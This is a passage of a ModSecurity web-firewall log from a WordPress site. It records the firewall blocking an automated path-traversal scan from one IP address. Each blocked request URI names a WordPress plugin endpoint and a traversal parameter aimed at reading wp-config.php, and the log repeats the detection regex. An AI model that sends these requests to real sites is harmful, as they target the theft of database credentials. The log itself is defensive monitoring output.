"/wp-content/plugins/db-backup/download.php"] [unique_id "Y8DxBcx9A9c0KkSpLadP9QAAAIg"] [Fri Jan 13 00:49:57.316685 2023] [:error] [pid 31476:tid 140315230955264] [client 185.206.224.212:42690] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/disclosure-policy-plugin/functions/action.php"] [unique_id "Y8DxBaGMrWzzUVMdEhcLowAAAMw"] [Fri Jan 13 00:49:57.432648 2023] [:error] [pid 31042:tid 140315163813632] [client 185.206.224.212:42692] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=..%2F..%2F..%2Fwp-config.php&currdir=%2Fwp-content%2Fplugins%2Fdm-albums%2F"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/dm-albums.php"] [unique_id "Y8DxBY6vAq65Ygpdg5ObKgAAAFQ"] [Fri Jan 13 00:49:57.549065 2023] [:error] [pid 31041:tid 140315306489600] [client 185.206.224.212:42694] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/template/album.php"] [unique_id "Y8DxBcPRCDYHCWWhHpAjoQAAAAM"] [Fri Jan 13 00:49:57.676625 2023] [:error] [pid 31042:tid 140315155420928] [client 185.206.224.212:42696] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dukapress/lib/dp_image.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dukapress/lib/dp_image.php"] [unique_id "Y8DxBY6vAq65Ygpdg5ObKwAAAFU"] [Fri Jan 13 00:49:57.792590 2023] [:error] [pid 31043:tid 140315180599040] [client 185.206.224.212:42698] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "Y8DxBcx9A9c0KkSpLadP9gAAAJI"] [Fri Jan 13 00:49:57.908290 2023] [:error] [pid 31041:tid 140315138635520] [client 185.206.224.212:42700] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php/?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php/"] [unique_id "Y8DxBcPRCDYHCWWhHpAjogAAABc"] [Fri Jan 13 00:49:58.033924 2023] [:error] [pid 31476:tid 140315205777152] [client 185.206.224.212:42702] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLpAAAAM8"] [Fri Jan 13 00:49:58.151682 2023] [:error] [pid 31476:tid 140315272918784] [client 185.206.224.212:42704] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLpQAAAMc"] [Fri Jan 13 00:49:58.280441 2023] [:error] [pid 31476:tid 140315405498112] [client 185.206.224.212:42706] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLpgAAAMA"] [Fri Jan 13 00:49:58.411601 2023] [:error] [pid 31476:tid 140315298096896] [client 185.206.224.212:42708] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLpwAAAMQ"] [Fri Jan 13 00:49:58.526366 2023] [:error] [pid 31476:tid 140315155420928] [client 185.206.224.212:42710] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLqAAAANU"] [Fri Jan 13 00:49:58.640672 2023] [:error] [pid 31476:tid 140315264526080] [client 185.206.224.212:42712] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ibs-mappro/lib/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ibs-mappro/lib/download.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLqQAAAMg"] [Fri Jan 13 00:49:58.755418 2023] [:error] [pid 31476:tid 140315239347968] [client 185.206.224.212:42714] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/image-export/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/image-export/download.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLqgAAAMs"] [Fri Jan 13 00:49:58.883780 2023] [:error] [pid 31476:tid 140315197384448] [client 185.206.224.212:42716] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLqwAAANA"] [Fri Jan 13 00:49:58.998067 2023] [:error] [pid 31476:tid 140315222562560] [client 185.206.224.212:42718] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jquery-mega-menu/skin.php"] [unique_id "Y8DxBqGMrWzzUVMdEhcLrAAAAM0"] [Fri Jan 13 00:49:59.112423 2023] [:error] [pid 31476:tid 140315306489600] [client 185.206.224.212:42720] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/justified-image-grid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/justified-image-grid/download.php"] [unique_id "Y8DxB6GMrWzzUVMdEhcLrQAAAMM"] [Fri Jan 13 00:49:59.231883 2023] [:error] [pid 31476:tid 140315214169856] [client 185.206.224.212:42722] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=..%2F..%2F..%2Fwp-config.php&action=asdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/livesig/livesig-ajax-backend.php"] [unique_id "Y8DxB6GMrWzzUVMdEhcLrgAAAM4"] [Fri Jan 13 00:49:59.347998 2023] [:error] [pid 31476:tid 140315138635520] [client 185.206.224.212:42724] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/localize-my-post/ajax/include.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "Y8DxB6GMrWzzUVMdEhcLrwAAANc"] [Fri Jan 13 00:49:59.470769 2023] [:error] [pid 31476:tid 140315230955264] [client 185.206.224.212:42726] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-photo-gallery/macdownload.php"] [unique_id "Y8DxB6GMrWzzUVMdEhcLsAAAAMw"] [Fri Jan 13 00:49:59.599680 2023] [:error] [pid 31042:tid 140315197384448] [client 185.206.224.212:42728] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "Y8DxB46vAq65Ygpdg5ObLAAAAFA"] [Fri Jan 13 00:49:59.716590 2023] [:error] [pid 31043:tid 140315222562560] [client 185.206.224.212:42730] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mailz/lists/config/config.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mailz/lists/config/config.php"] [unique_id "Y8DxB8x9A9c0KkSpLadP9wAAAI0"] [Fri Jan 13 00:49:59.831386 2023] [:error] [pid 31043:tid 140315247740672] [client 185.206.224.212:42732] [client 185.206.224.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id 